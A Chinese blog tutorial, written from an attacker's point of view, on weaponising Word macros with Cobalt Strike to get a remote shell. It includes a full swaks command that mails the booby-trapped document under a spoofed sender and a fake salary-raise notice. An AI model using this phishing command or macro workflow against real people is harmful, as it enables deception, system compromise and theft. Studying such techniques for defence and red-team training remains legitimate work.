在日常工作中,形形色色的各种办公软件已经离不开我们。而利用各种
word
excel
ppt
进行各种攻击。本文将从攻击者的角度进行演示,请勿非法、恶意攻击他人。
宏就是一些命令组织在一起,作为一个单独命令完成一个特定任务。Microsoft Word中对宏定义为:"宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易"。Word使用宏语言Visual Basic将宏作为一系列指令来编写。
首先登录CS
创建监听
生成宏
点击attacks
-packages
-ms office macro
然后点击Copy Macro
保存文件后,运行文件!成功得到shell
利用SWAKS,我们可以更加便捷的将带有宏的word文档发给他人。
使用示例如下:
swaks --to ****@qq.com --from l***nb@7777.com --h-From: '"秘书小爱"<admin@admin.com>' --header "Subject: 关于集团年底涨薪申请word模板更新的通告" --body "各位一线工程师,集团对外word统一格式,请下载附件使用,谢谢合作!" --attach-name 渗透报告模版.doc --attach-type application/msword --attach /tmp/渗透报告模版.doc --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码
这样当被人打开word文档后,我们就可以获得相应的sheel.
随着office版本的升高,需要生成宏模板才可以。
版权属于:逍遥子大表哥
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。